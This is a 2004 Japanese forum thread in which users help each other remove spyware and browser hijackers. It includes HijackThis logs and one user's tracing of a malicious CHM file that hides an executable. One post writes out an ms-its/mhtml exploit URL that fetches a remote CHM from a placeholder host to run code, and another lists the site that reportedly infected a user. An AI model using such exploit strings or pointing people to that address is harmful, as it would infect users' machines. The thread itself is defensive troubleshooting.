C:\Program Files\SpywareGuard\sgmain.exe
C:\Program Files\SpywareGuard\sgbhp.exe
C:\WINNT\system32\imejpmgr.exe
C:\Documents and Settings\Administrator\デスクトップ\セキュリティ\HijackThis\HijackThis.exe

F0 - syst>m.ini: Shell=
F0 - R>ystem.ini: Shel>=
F0 - R>ystem.ini: UserInit=
O2 - BHO: SpywareGuard Download Protection - {4A368E80-174F-4872-96B5-0B27DDD11DB2} - C:\Program Files\SpywareGuard\dlprotect.dll
O2 - BHO: NAV Helper - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Program Files\Norton SystemWorks\Norton AntiVirus\NavShExt.dll
O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Program Files\Norton SystemWorks\Norton AntiVirus\NavShExt.dll
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINNT\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [ICONFIG] C:\PROGRA~1\COMMON~1\SCM\ICONFIG.EXE

799 :755:04/07/13 07:11 ID:OLv7nZHz
O4 - HKLM\..\Run: [mp3infp] C:\Program Files\mp3infp\mp3infp_regist.exe
O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [ccRegVfy] "C:\Program Files\Common Files\Symantec Shared\ccRegVfy.exe"
O4 - HKLM\..\Run: [hcwPVRReset] C:\PROGRA~1\WinTV\hcwP1Utl.exe -Quiet -ResetHardware -NotifyResetFailure -KeepTrying
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\j2re1.4.2_04\bin\jusched.exe
O4 - HKLM\..\Run: [WinFast Schedule] C:\Program Files\WinFast\WFTVFM\WFWIZ.exe
O4 - HKLM\..\Run: [C-Media Mixer] Mixer.exe /startup
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\RunServices: [SchedulingAgent] C:\WINNT\system32\mstask.exe
O4 - HKCU\..\Run: [Internat.exe] Internat.exe
O4 - Startup: NTUSER.DAT
O4 - Startup: ntuser.dat.LOG
O4 - Startup: ntuser.ini
O4 - Startup: plugin131_09.trace
O4 - Global Startup: ntuser.pol
O9 - Extra button: Irvine (HKLM)
O9 - Extra 'Tools' menuitem: Irvine(&I) (HKLM)
O16 - DPF: {166B1BCA-3F9C-11CF-8075-444553540000} (Shockwave ActiveX Control) - http://fpdownload.macromedia.com/get/shockwave/cabs/director/sw.cab
O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} (Update Class) - http://v4.windowsupdate.microsoft.com/CAB/x86/unicode/iuctl.CAB?37867.5121180556
O16 - DPF: {C2FCEF52-ACE9-11D3-BEBD-00105AA9B6AE} (Symantec RuFSI Registry Information Class) - http://security.symantec.com/SSC/SharedContent/common/bin/cabsa.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab



800 :ひよこ名無しさん:04/07/13 07:55 ID:???

  ∧_∧
 ( ・∀・) ドキドキ
 ( ∪ ∪
 と__)__)

801 :ひよこ名無しさん:04/07/13 07:56 ID:???
>>797
HijackThisにはやっぱり現れていない。
駄目だった。見つからない。

トレンドマイクロ ウイルスデータベース
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/

ノートン使っているようだけど、
一応トレンドマイクロでもオンラインスキャンしてみてはどうだろうか。

802 :ひよこ名無しさん:04/07/13 08:03 ID:???
( ´_ゝ`)フーン

803 :755:04/07/13 08:08 ID:OLv7nZHz
>>801
HijackThis では、異常は出ませんでしたか。
他にも情報を出せるといいのですが、
貴重な時間、私の為に割いて頂き有難うございます。

オンラインスキャンも試して見ます。


804 :ひよこ名無しさん:04/07/13 09:10 ID:uEbnKL6J
OPERAはアドワエアというものらしいですがスパイソフトが検出されたりしないのでしょうか?

805 :ひよこ名無しさん:04/07/13 09:22 ID:???
       ∧         ∧
        / ヽ        ./ .∧
     /   `、     /   ∧
    /       ̄ ̄ ̄    ヽ   ふ〜、>>804気にするな。
   /:::::::::            .\
  /:::::::::: ヽ-=・=-′ ヽ-=・=- ∧/           ∧
  ヽ:::::::::::    \___/   / ヽ          / ヽ
    ヽ::::::::::::::    \/    /   ヽ_____/  ヽ
  /            /                \
 |            /                   ヽ
 |            '''''"´)   ●   \─/  ●   |'´)
  \           -‐´         ヽ/       /´
   |       |   \                  /
   |       |    ~~~~|~~

806 :ひよこ名無しさん:04/07/13 09:31 ID:???
(((((((( ;゚Д゚)))))))ガクガクブルブルガタガタブルガタガクガクガクガクガク

807 :755:04/07/13 09:46 ID:OLv7nZHz
>>801
教えて頂いた、オンラインスキャンは私の環境で実行すると
何度試しても、「問題が発生したため、Microsoft Internet Explorer を終了します。」
と出て終了してしまいます。
最初は、試用中のOperaで実行したのですが、対応していないようなので
IEを起動、セキュリティも全部切って何度か挑戦したのですが、駄目でした。
ノートンと相性が悪いのかな、それともPC自体が不安定なのかな。

せっかく教えてもらったのに、活用できずにすいません。

>>804
今朝方Operaインストールしました、
当然ですが、Operaに関してはCWShredder→spybotsd13→Ad-aware 6.0を
実行しても何も出てきませんでした。
素人考えですが、現行のスパイウエアのエンジンを使うか、
スパイウエアとして登録されない限り、スパイウエアと識別される事は
無いと思います。
結構有名なソフトでもスパイウエアが入っているとされる物は
有りますから、今後はどうなるかわかりません。
ただ、認定されると広告を削除する駆除ソフトが出来るので、
広告無しで使えたりする可能性もあります、、、勝手な想像ですが。

808 :ひよこ名無しさん:04/07/13 09:53 ID:???
>>807
これも試してみて。
http://www.vintage-solutions.com/Japanese/Antivirus/Super/index.html

809 :755:04/07/13 10:44 ID:OLv7nZHz
>>808
試してみますけど、

一般向け?
プログラムファイル 自己解凍型ファイル / 転送モジュール:MAP20040709
ファイル名 Antidote.EXE
サイズ (バイト) 4,967,207

読売新聞向け

プログラムファイル 自己解凍型ファイル / 転送モジュール:MAP20040709
ファイル名 ADAVSL411.EXE
サイズ (バイト) 4,756,345
(拡張データベース)
プログラムファイル 自己解凍型ファイル / 転送モジュール:MAP20040709
ファイル名 ADAVSLEX411.EXE
サイズ (バイト) 4,874,717

何で、3種類もあるんだろう?


810 :755:04/07/13 11:53 ID:OLv7nZHz
結局、一番は早くダウンロード出来た一般向けで検索しています。
圧縮ファイルを含めるとデータ量が多いので思った以上に時間が掛かりそうですが、
何個か引っ掛かっているようなので、もしかすると新たな発見があるかも、です。
結果が出たら報告します。


811 :ガイシュツだが…:04/07/13 12:15 ID:???
Operaはスパイウェアではなくアドウェア。OperaのTools→設定→広告
に明示してあるとおり。googleに閲覧履歴が送られるのがいやなら、
「一般的な画像の広告」に設定すること >>404

OperaにしてもFirefoxにしても「OK?」とか出た窓にOKしてればハイ
ジャッカーだろうとウィルスだろうとインストールされてしまうのは当然。
ブラウザはアンチウィールスソフトでもファイアウォールでもない。

IEの問題は単にページを「見ただけ」で無理やり悪プログラムを押し込まれ
たり、レジストリを改竄されたりするという点。非IE部品のブラウザは「見た
だけ」ではハイジャックされることはない。(少なくともspywareinfoその他
信頼性のある情報源では報告されてない)

★IE-SPYAD★はIEに危険をおよぼす可能性のある悪サイトのリスト。実行
すると自動的にサイトを「制限付きサイト」ゾーンに登録する。IEを使うなら
ぜひ使うべき。リストはひんぱんに更新される。

専用スレ「制限付きサイトへ登録 IE-SPYAD」
http://pc5.2ch.net/test/read.cgi/sec/1076041687/
本家 https://netfiles.uiuc.edu/ehowes/www/resource.htm

812 :ひよこ名無しさん:04/07/13 13:06 ID:???
もしも対策ソフトがスパイ定義に加えればOperaもりっぱなスパイウェアだなw

813 :ひよこ名無しさん:04/07/13 13:24 ID:???
何を持ってスパイウェアとするのか?情報集めのスパイウェアならdoubleclick.com、valueclick.comなんかは朝日新聞や読売新聞のサイトでもある

814 :ひよこ名無しさん:04/07/13 13:26 ID:???
>>811
悪いんだが例のサイトをOpera、
ウィルスソフト切りで踏んで、クッキーやActive Xのダイアログに
全部「No」ってのやってみてくれないかな?



815 :ひよこ名無しさん:04/07/13 13:41 ID:???
リアルワンプレイヤも情報集めだな。

816 :ひよこ名無しさん:04/07/13 15:18 ID:Xe0F3k4h
>>62
ありがとう、もどったよ。

817 :755:04/07/13 15:21 ID:OLv7nZHz
皆様のお陰で、about:blank search for…の元凶ファイルを見つけることが出来ました。

元凶ファイル確定までの経緯は、
先ず >>808 のANTIDOTE for PC Antivirus SuperLite で検索してみました。
検索結果は、
http://2chupup.mine.nu/imgbox/img20040713145134.jpg
画像の通り懐疑という結果で、ファイルが検出されました。
そのrootxsp.chm を調べると、丁度昨日地雷を踏んだ時間と一致し
これが元凶ではないかと疑いはじめました。

このファイルはhelpで使われる形式ですが、ダブルクリックしても真っ白な
help画面が表示されるだけで他に変化無し、疑いはあれど証拠が無い、
問題は本当に元凶ファイルなのかの検証です。

それでCHMファイルに関して片っ端から検索して見ました。
そして何とか、下記のツールを見つけました。
(復元しているつもりなのに、何でエンコーダ何だろう?、
そのへんは詳しくないので偉い人に任せます)
ttp://www.gridinsoft.com/
CHM Encoder

上記のツールで、疑わしかったrootxsp.chmを変換します。
#IDXHDR、#ITBITS、#STRINGS、#SYSTEM、#TOPICS、#URLSTR、#URLTBL、
1.htm、on-line.exe 以上9個のファイルが出現しました。
ttp://2chupup.mine.nu/imgbox/img20040713150850.jpg
画像の上が1.htmlのソース

ファイルをエディタで覗いて見ましたが、
1.html は、on-line.exe を起動させるためのスクリプトファイルのようです。
ここまで来ると、on-line.exe を直接起動させて、SpywareGuardの反応を見たくなり、
ダブルクリックしてみました。

818 :755:04/07/13 15:22 ID:OLv7nZHz
>>817 つづき

見事にSpywareGuardは、レジストリの書き換えに反応し、
そしてsystem32に新たにdllファイルが出来ていました。
これで、疑いから確証に変わりました。

以上が、私が行った検証です。



819 :755:04/07/13 15:23 ID:OLv7nZHz
about:blank search for… で困っている方は、対策法の一つとして
以下を試してみてください、もしかすると同じ方法で対処できるかもしれません。

以下からANTIDOTE for PC Antivirus SuperLiteをダウンロード
ttp://www.vintage-solutions.com/Japanese/Antivirus/Super/index.html
(ダウンロードに関しては、私も >>808氏の書き込みで始めて知ったので、自己責任でお願いします)
 3種類有りますが3つとも試した結果、私の場合は、一般向け?しか検出しませんでした。
 プログラムファイル 自己解凍型ファイル / 転送モジュール:MAP20040709
 ファイル名 Antidote.EXE
 サイズ (バイト) 4,967,207

懐疑または、認定されたファイルをピックアップする。
覚えていたら、その中から感染した時間のタイムスタンプのものを探す。
もしかすると検索しなくてもCドライブのrootにそれらしいファイルが有るかも、
その辺は、情報交換してみないと分かりませんが。

元凶ファイルとsystem32(2000、NT)system(9x系)のdllファイルとtempのsp.htmlを削除したら、
3つの定番駆除ツールで駆除し、webの設定のリセット、しばらく様子を見る
(dllのファイル名は、Search forのソースから割り出してください >>9 参照)

心配ならSpywareGuard でレジストリーが書き換えられないかしばらく監視させる。

大体こんな感じかな、少しでも参考に成れば幸いです。
寝不足で頭が半分働かないので、どなたか分かり易くまとめて下さいね。

私もしばらく再発しない事を祈りながら、様子を見ていきたいと思います。
色々助言を頂いた皆様、本当に有難うございました。
特に >>808氏、貴方の助言で元凶が発見できました、本当に有難う。
これで再発したら、恥かしいな。



820 :ひよこ名無しさん:04/07/13 15:28 ID:???
>>819
とりあえず、様子見だね。
まじで乙。人柱精神は尊敬。

この辺の事はアダルト被害対策サイトの識者は知ってるのかな。

821 :ひよこ名無しさん:04/07/13 15:32 ID:???
i<´   }\   , - 、
   ヽ.._\./  .ンく r-兮、 __
    ∠`ヽ.! /   ヾニEヲぐ ,ゝ->  
   /_`シ'K-───‐-、l∠ イ   さすがエロ河童だ
   l´__,/l\、_ ̄0¨0)゙@Yヘ, -┤    スパイウェア入れられてもぜんぜん動じないぜ!
.    l'___|⌒ヾ''ー==、ーr='イ i二|      
   / .」   i   /./7r‐く  lー!      
.   f.  ヽ‐i人.∠'<   _i. l,.-ゝ.
    トiヘヘ「ト〈      `X  トレi7__|
   〉ト:トハj`! i.    /  トー┤lルj,リ
  /‐+----+‐l    iー--i---ヾ'〃
.  l_i____i__|   |___i,__i_|




822 :ひよこ名無しさん:04/07/13 15:35 ID:???

  エ ロ ガ ッ パ 、 必 死 だ な w

823 :ひよこ名無しさん:04/07/13 15:36 ID:???
>>819
rootxspまるごと削除しろ、ハゲ。

824 :ひよこ名無しさん:04/07/13 15:37 ID:???
>>823 ← .chmの構造がわかってない


825 :ひよこ名無しさん:04/07/13 15:38 ID:???
>>824
お前に回答者は無理。

826 :ひよこ名無しさん:04/07/13 15:40 ID:???
>>825 ← 必死でごまかそうとしてる。

827 :ひよこ名無しさん:04/07/13 15:40 ID:???
>>826
お前に2ちゃんねるは無理

828 :755:04/07/13 15:53 ID:OLv7nZHz
>>814
しばらく、IEで様子を見ることにしましたので最後に
マルチメディア系とクッキーを切って接続してみました。
流石にウイルス対策ソフトを切るのはご勘弁ください。

IE、Oreraともウイルスの警告の数は同じ、但しPCへの
影響は不明です。
たぶん、IEの弱い所突いて来るウイルスが多いから
復帰できなくなるかも、、流石にそれは出来ません
殆ど参考に成りませんが、これでお許しを

>>823
書き方悪かったです。
元凶ファイル=今回の場合は、rootxsp.chm です
真っ先に削除しています。


829 :ひよこ名無しさん:04/07/13 16:38 ID:???
>>828
>>199のリンク先にはウィルス反応があるな。
セキュリティパッチ当てていればやられないタイプだと思うが?
しかし、よくそこまで調べたもんだ。

830 :ひよこ名無しさん:04/07/13 17:04 ID:???
>>829
>>199には今はもう、ウィルスはいない。

831 :もっちー:04/07/13 17:09 ID:+BgFK6os
失礼します、↓のアドを開いてしまいウィルスをもらってしまい
ネットへの繋ぎが出来なくなり、パソコン自体が調子悪くなって
しまいました。どうすれば直す事が出来るのでしょうか?知識も
無く困っています、どうか詳しい方教えてください。
ttp://qma2ch.hp.infoseek.co.jp/cgi-bin/img-box/img20040614030433.jpg

832 :ひよこ名無しさん:04/07/13 17:12 ID:???
>>831
質問するのは、>>4-11 を実行してから。

833 :ひよこ名無しさん:04/07/13 17:27 ID:???
>>830
現在でも反応するって言ってるのに。

834 :ひよこ名無しさん:04/07/13 17:30 ID:???
>>831
バカだから
全部のすっぱいウェアをインストールされたのなら、レジストリの変更ヶ所は10000以上だから、修復不能。
さっさとシステムの復元せい。

835 :もっちー:04/07/13 17:53 ID:+BgFK6os
>832
分かりましたとりあえず試してみます。
>834
そうなんですか?修復不可能とは困りました

836 :ひよこ名無しさん:04/07/13 19:52 ID:7XsEQeOP
私も>>831と同じアドレスを開いてしまいました。
2〜3日前に開いてしまい、システムの復元をして
その時はなんとか元に戻ったのですが
昨日Norton AntiVirusに「Trojan Horseに感染しています。
ファイルを修復出来ません。」と出ました。
ウィルス定義の更新をしましたが修復できません。
昨日からウィルス総合板やこちらのスレを見ているのですが
もうどうしたら良いかわかりません。助けてください。

837 :ひよこ名無しさん:04/07/13 20:09 ID:???
とりあえずテンプレ見れ

838 :ひよこ名無しさん:04/07/13 20:10 ID:???
>836

トレンドマイクロ ウイルスデータベース
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/
で調べてみてはどうか。個別のウィルス対策法がのってる。
手動で削除しないといけないのがあるかも。
たぶんレジストリを書き換える必要が出てくるので、学習して慎重に


839 :ひよこ名無しさん:04/07/13 22:05 ID:???
>>836
Trojan(トロイ)は、独立したプログラムだから修復できないのは、あたりまえ。
削除するしかない。
ファイル名が分かっているのならセーフモードで起動して、手動で削除。
改ざんされたレジストリも手動で治さなければいけない場合もある。

840 :ひよこ名無しさん:04/07/13 22:12 ID:???
>>817>>819
この解決法は、初めて見たような気がするのですが、どこかで
告知した方がよくないですかね。
about:blankタイプ、変種が出てより悪質化しているような感じですね。
テンプレに書いてある方法だけでは駆除しきれない。
うちのがやられたときに、コンピュータの検索自体が効かなくなって
コンピュータの中にあるファイル名が一切調べられなくなって
大弱りでした。
あとからウィルス対策ソフトを導入した場合、
ウィルス検索から身を隠すタイプのがあるらしく、特定できない
しかけのもあるみたいですし。


841 :755:04/07/13 23:59 ID:OLv7nZHz
今の所、SpywareGuardからの警告も無く順調に稼動しています。

今読み返すと、潜んでいた元凶ファイルを発見した嬉しさと、寝不足と、色々助言して
頂いた方に早く結果報告をしたいとの思いやらで、まとまりの無い文章になってますね。
元凶が1.html やon-line.exe が隠匿されているファイルと分かった今ならCHM Encoderを
使わなくてもバイナリエディタで覗けば、確認できます。
http://age.tubo.80.kg/age01/img-box/img20040714003503.jpg

先程、about:blank search for…で困っている友人に連絡してファイルを送ってもらい検証
してみました。(因みに、私はWindows2000友人はWindows98se)
送ってもらったファイルの条件は、私の所に居た元凶ファイルの条件に当てはまるものにしました。

 1.Cドライブのrootにあるファイル(限定しない方がよかったかもしれない)
 2.拡張子が、chm
 3.サイズが30kb前後
(今回は条件に出しませんでしたが、ダブルクリックしても真っ白なHELPファイルしか出ない)
以上の条件に当てはまるファイルとして、tttxxsp.chm (私の時のファイル名はrootxsp.chm)が
送られて来ました。今回は、バイナリエディタでファイルを覗いただけですが、1.html とon-line.exeが
確認されました。

まだ、検証した数が2つですが何度スパイウエア対策ソフトで削除してもbout:blank search for…が
再現される方は、上記の条件に合うファイルが無いか確認してみてください。
色々な方の報告があれば、ある程度対策法を絞れるんじゃないかと思います。
他にも違う種類の物が多種有ると思いますが、少しでも参考に成れば幸いです。


842 :ひよこ名無しさん:04/07/14 00:15 ID:???
>>841
本家のサイトに情報提示してみてはいかがだろうか。

【アダルトサイト被害対策の部屋】
ttp://higaitaisaku.web.infoseek.co.jp/index.html

ここの情報専用掲示板やゲストブックと雑談などで、
情報提供すればかなり有益に扱ってもらえる可能性がある。
無理にとはいわないが。

843 :755じゃないが…:04/07/14 00:17 ID:???
>>840 とりあえず755氏のレポートの要点を整理してみた。

■about:blank search for…の元凶はコンパイル済みヘルプファイル

このURLを踏んで感染した
http:// hyper10.amuser-net.ne.jp/~ auto/b3/usr/azumi/brd1/bbs.cgi

ANTIDOTE for PC Antivirus SuperLiteを下記からダウンロード
http://www.vintage-solutions.com/Japanese/Antivirus/Super/index.html
インストールしてスキャン実行する。rootxsp.chm が懐疑ファイルとしてピック
アップされた。地雷を踏んだ時間と一致。このファイルはコンパイル済みヘルプ
ファイル形式だが、ダブルクリックしても空白のhelp画面が表示されるだけ。

CHM Encoder (CHMファイルをHTML形式のソースファイルに変換するツール)
http://www.gridinsoft.com/ を利用して問題のrootxsp.chmを変換すると、
#IDXHDR、#ITBITS、#STRINGS、#SYSTEM、#TOPICS、#URLSTR、#URLTBL、
1.htm、on-line.exe 以上9個のファイルが現れた。

エディタで内容を見ると、1.html は、on-line.exe を起動させるためのスクリプト
ファイルらしい。on-line.exe を直接起動させてみる。SpywareGuardが、レジストリの
書き換えを警告。system32に新たにdllファイルが出来ている。よってrootxsp.chmが
元凶ファイルと確定。

元凶ファイルとsystem32(2000、NT)system(9x系)のdllファイルとtempのsp.htmlを
削除。3大定番駆除ツールで駆除し、webの設定のリセット、しばらく様子を見る
(dllのファイル名は、Search forのソースから追跡 >>9 参照)

844 :ひよこ名無しさん:04/07/14 00:37 ID:???
実際は自分で感染してみないと分からないけど、
rootxsp.chmはなんらかのANTIDOTEに反応したということは、
何らかのスキャンで反応する可能性がある。

特に大事なのはここかな
 1.Cドライブのrootにあるファイル(限定しない方がよかったかもしれない)
 2.拡張子が、chm ← ファイル名はランダムか?
 3.サイズが30kb前後

今回のはchmが偽装したDL系トロイということになるのだが、
問題はHijackThisに現れていないためにどのタイミングで発祥するかが、掴めていないということ。
それが掴めてレジストリのどの値を使って起動(スパイの呼び込み)するかまで分かれば、
もっと確実で簡単な治療方法が見つかるかもしれない。

845 :ひよこ名無しさん:04/07/14 00:39 ID:???
>>844 (誤字訂正)
×rootxsp.chmはなんらかのANTIDOTEに反応したということは、
○rootxsp.chmがANTIDOTEに反応したということは、

申し訳ない・・・○| ̄|_

846 :ひよこ名無しさん:04/07/14 00:44 ID:???
.chmは.htmlをコンパイルしたもので、ActiveXが有効になってれば、
html同様ファイルを実行してしまう。
.exeを内部に組み込めるから、別にダウンロードする必要がない。
でも、なんでHijackThisに現れないんだろ。

847 :ひよこ名無しさん:04/07/14 00:53 ID:SqnyrS6s
同人誌サイト見てから急にエロサイトからのメールがくる様になったんですが、
エロサイト見ただけでアドレスって知られるもんなんですか?

848 :ひよこ名無しさん:04/07/14 00:56 ID:???
>>847
わかる。
ファイヤウォールソフトぐらい入れとけ。

849 :ひよこ名無しさん:04/07/14 00:58 ID:???
>755
さんが 初心者レベルのスキルの人でなかったのが 幸いしましたね。
たぶん自分が感染したのも同じタイプ。
テンプレの方法全部試したつもりなのに 解決できずじまい
この情報がもっとはやくわかってたら
リカバリーせずに すんだかも○| ̄|_

850 :ひよこ名無しさん:04/07/14 01:00 ID:SqnyrS6s
>>848
じゃあ今来ているメールが来ないようにするにはどうすればいいんですか?

851 :ひよこ名無しさん:04/07/14 01:03 ID:???
>>850
メッセージルールで削除、アンチSpamツールで削除、メールアドレス変更

852 :755:04/07/14 01:12 ID:z1hWSMIr
>>842
そうですね、【アダルトサイト被害対策の部屋】には色々とお世話に
成ったので、後で報告しておきます。

>>843
まとめ、有難うございます。
使わせていただきます。

>>844
知人が先に感染していたんですが、私自身が実際に感染するまで、
何で駆除しても再発するんだろうと思っていました。
chmファイルをダブルクリックしても、真っ白なHELPファイルが出現するだけで、
on-line.exe は展開されません、本当に何に反応してどのタイミングで発動する
のだろうか、不思議です。

>>846
そうなんですか、巧く仕込まれているんですね


853 :847:04/07/14 01:30 ID:SqnyrS6s
>>851
ありがとうございます。
メッセージルールってのはよく分からないけど、まとめ見て何とかして見ます。
もし出来なかったらファイヤーオールとウイルスバスターのメールセキュリティ「高」だけじゃ駄目でしょうか?

あとアドレス知られただけで変な請求書とか来ないですよね?

854 :ひよこ名無しさん:04/07/14 01:35 ID:???
>>853
それじゃ、メールの自動削除はできん。

請求メールは来るだろ。無視すればいいだけ。

855 :ひよこ名無しさん:04/07/14 01:44 ID:???
>>853
請求が来たらなんでもほいほい払っちまうのかよ。万一インチキ
請求が来たって払うな。お前のようなヘタレはここ良く読んで被害者
にならんようにしろ
【Mail・葉書】総合スレッドPartW【架空請求】
http://that3.2ch.net/test/read.cgi/bouhan/1086362147/


856 :847:04/07/14 02:03 ID:SqnyrS6s
>>854,855
どうもです。
俺、心配性だから請求メール来たらどうしようとかなりガクブルしてました。
皆さんはそんなメール来た事あるんですか?

あと最後に一つだけ質問させて下さい。メッセージルールの削除ってどうやるんですか?

857 :ひよこ名無しさん:04/07/14 02:17 ID:???
>>856
検索したか?

858 :847:04/07/14 02:52 ID:SqnyrS6s
すいませんしていませんでした。
明日試験があるので明日また質問させてもらいます。

859 :ひよこ名無しさん:04/07/14 02:52 ID:???
>>858
何の試験よ?

860 :ひよこ名無しさん:04/07/14 03:30 ID:???
♪ひ〜とみ〜をと〜じて〜 き〜みを〜えが〜くよ〜

【助けてください!】エロサイト見たら…助けてください!Part31【助けてください!!】
http://pc6.2ch.net/test/read.cgi/pcqa/1088914336/l50

そ〜れ〜だ〜けで〜 い〜いぃ〜♪

861 :ひよこ名無しさん:04/07/14 03:34 ID:???
困ってる人をニヤニヤしにきましたヨロシク

862 :たすけて:04/07/14 06:06 ID:Pi+ceo1v
いつからか、ttp://searchportal.info/ という検索サイトがホームに勝手に
登録されるようになって、エロいサイトが勝手に出てきたりする
ようにもなってしまいました・・。
Ad-aware 6、CWShredder、Spybot、norton 2002 など、いろいろな
アンチウイルスで調べ、クッキー&ファイルの削除、wab設定のリセット、
履歴のクリアもしましたが、まったく取り除くことができません。
どうしてもわかりません、なにか他に方法はないのでしょうか?


863 :ひよこ名無しさん:04/07/14 06:50 ID:???
>>862
氏ねバーカ

864 :ひよこ名無しさん:04/07/14 07:58 ID:???
>>862
ページ見てきた。新しいタイプのCWS?かな。
システムの復元をしてみる。それで治らなかったら正直対処法がわからない。
Home Search Assistentと関係がある模様。すごく厄介。
資料が少ないが取り合えず調べみた。

CWS.Yexe.2(ログを見ると次の症状もでているようだ)
ttp://higaitaisaku.web.infoseek.co.jp/cgi-bin/ht/database.cgi?cmd=dp&num=233

ttp://searchportal.infoから戻らない!(質問掲示板より)
ttp://www.google.co.jp/search?q=cache:U5MkP_OWqy8J:higaitaisaku.web.infoseek.co.jp/cgi-bin/cbbs.cgi%3Fmode%3Dres%26namber%3D30665%26page%3D%26no%3D0+searchportal&hl=ja&lr=lang_ja&inlang=ja

それとSearch forをしらみつぶしにあたってみた方がいいかも知れない。
とりあえず>>843の方法は効くかどうか分からないが試してみるべし。

865 :ひよこ名無しさん:04/07/14 08:59 ID:OAxkMkDf
ギコナビ使ってたらVBS.Internal ってウイルスに感染しました。
放置で大丈夫って聞いたんですけど本当ですか?


866 :ひよこ名無しさん:04/07/14 09:07 ID:???
>>865
まぁ、本当だよ。


867 :755:04/07/14 09:14 ID:hRxr3UoI
先程、【アダルトサイト被害対策の部屋】の掲示板に報告してきました。
助言を頂いた皆様、本当に有難うございました。

868 :865:04/07/14 09:18 ID:OAxkMkDf
ありがとうございます。
ウイルススキャンをしても何も引っかからないし
↓ここで症状を調べたんですけど理解できずびびってました。
ttp://www.symantec.co.jp/region/jp/sarcj/data/v/vbs.internal.html
ちなみにまだ感染中なんですか?


869 :ひよこ名無しさん:04/07/14 09:26 ID:???
>>868
だから、感染なんかしてないんだって。

ノートン 誤反応

辺りで検索してみろよ。

870 :ひよこ名無しさん:04/07/14 09:30 ID:???
>>868
ノートンがvbsウィルスのソースに誤反応2
http://pc6.2ch.net/test/read.cgi/pcqa/1033948204/

871 :865:04/07/14 09:47 ID:???
>>869
>>868
ありがとうございます。
理解できました。

872 :865:04/07/14 09:49 ID:???
870さんでした。失礼しました。

873 :ひよこ名無しさん:04/07/14 14:01 ID:???
>>755さん,驚異的に乙です。

私見ですが,on-line.exe の発動は chm をダウンロードした瞬間の一度のみと思います。
ms-its: スキーム脆弱性を狙う攻撃者は
 ms-its:mhtml:file://c:\no_such_file.mht!http://example.net/spy.chm::/danger.htm
このようなコードをIEに読ませます。するとここでは spy.chm がダウンロードされ
danger.htm が開かれる,というからくりですね。
danger.htm の中には <object ...> なんてタグがあり,on-line.exe が実行されます。

chm をダブルクリックしても何も起きなかったのは,おそらく「chm内で最初に表示するページ」が
設定されていないため……かなあ?
要するにダブルクリックで spy.chm を開いた場合,別に danger.htm を開けとは指示を受けていないため
何も起こらなかった,と考えるのが妥当かなと。

# 自分で chm を作って実験していますが,全然うまくいかないし (;´Д`) 対処済みだったっけ……

874 :ひよこ名無しさん:04/07/14 18:05 ID:26ro5t6P
ホームがres://dpctu.dll/index.html#96676というページに固定されるようになったので、
>>5の(a)まで試みたのですが直りません。最新のCWShredderを使用しても、
Your sistem was completely clean.と表示されます。
(b)(c)にはThe page cannot be displayedと表示され行くことができませんでした。
あとメモ帳が起動できないのではなく、起動できてしばらくして自動的に閉じます。
どうすれば直りますか?XPです。

875 :847:04/07/14 18:16 ID:SqnyrS6s
>>859
予備校の試験です。
昨日メッセージルール適用して
アンチスパイウェアを掛けたら 1 4 0 個 も見つかってかなり凹んだ。

しかもActivXエロサイト関係のやつが3つもダウソしてるし・・・
本当に申し訳ない質問なんですが、
ActivXってADSLならダウンロードしても国際電話やQ2には掛からないですよね?

876 :ひよこ名無しさん:04/07/14 18:19 ID:???
>>874
Home Search Assistent
ttp://higaitaisaku.web.infoseek.co.jp/cgi-bin/ht/database.cgi?cmd=dp&num=217

治療法はほとんどない。システム復元にかけよう。
また、自力で治療したいなら下のサイトの方がいいかも。

【アダルトサイト被害対策の部屋】
ttp://higaitaisaku.web.infoseek.co.jp/index.html

掲示板で質問する場合は、下をよく熟読しそのサイト様に
迷惑のないようにお願いします。
ttp://higaitaisaku.web.infoseek.co.jp/caution.html

877 :ひよこ名無しさん:04/07/14 18:20 ID:???
>>875
かからない。
勝手に個人情報を送るだけ。

878 :ひよこ名無しさん:04/07/14 18:23 ID:???
>>875
ADSLなら、 国際電話やQ2につながりません。

879 :ひよこ名無しさん:04/07/14 18:28 ID:26ro5t6P
>>876
ありがとうございます。システム復元はポイントが無く出来ないようなので、
自力で直すしか無いみたいです。これからやってみます。

880 :非IE部品のブラウザ最新日本語版:04/07/14 18:40 ID:???
■Opera最新版7.52日本語版
 javaあり ftp://ftp.opera.com/pub/opera/win/752/ja/java/ow32jaja752j.exe
 javaなし ftp://ftp.opera.com/pub/opera/win/752/ja/std/ow32jaja752.exe
 (通常のユーザーにはjavaなしを推奨)

 使い方解説サイト「Opera.html」 http://www.geocities.jp/masayacom/

■Mozilla Firefox 最新日本語版 0.9.2
  Mozilla 日本語ローカライズ版リンク集
  http://level.s69.xrea.com/mozilla/jp.html#Firefox
  このサイト↑にファイル本体、インストール方法などのリンク一式が登録され
  ている。「Windows版インストーラ付き」をダウンロードして実行 (↓参考)
  http:// prdownloads.sourceforge.net/jlpmoz/FirefoxSetup-0.9.2-jaJP.exe?download

881 :非IE部品のブラウザ最新日本語版:04/07/14 20:08 ID:???
■Opera最新版7.52日本語版
 javaあり ftp://ftp.opera.com/pub/opera/win/752/ja/java/ow32jaja752j.exe
 javaなし ftp://ftp.opera.com/pub/opera/win/752/ja/std/ow32jaja752.exe
 (通常のユーザーにはjavaなしを推奨)

 使い方解説サイト「Opera.html」 http://www.geocities.jp/masayacom/

■Mozilla Firefox 最新日本語版 0.9.2
  Mozilla 日本語ローカライズ版リンク集
  http://level.s69.xrea.com/mozilla/jp.html#Firefox
  このサイト↑にファイル本体、インストール方法などのリンク一式が登録され
  ている。「Windows版インストーラ付き」をダウンロードして実行 (↓参考)
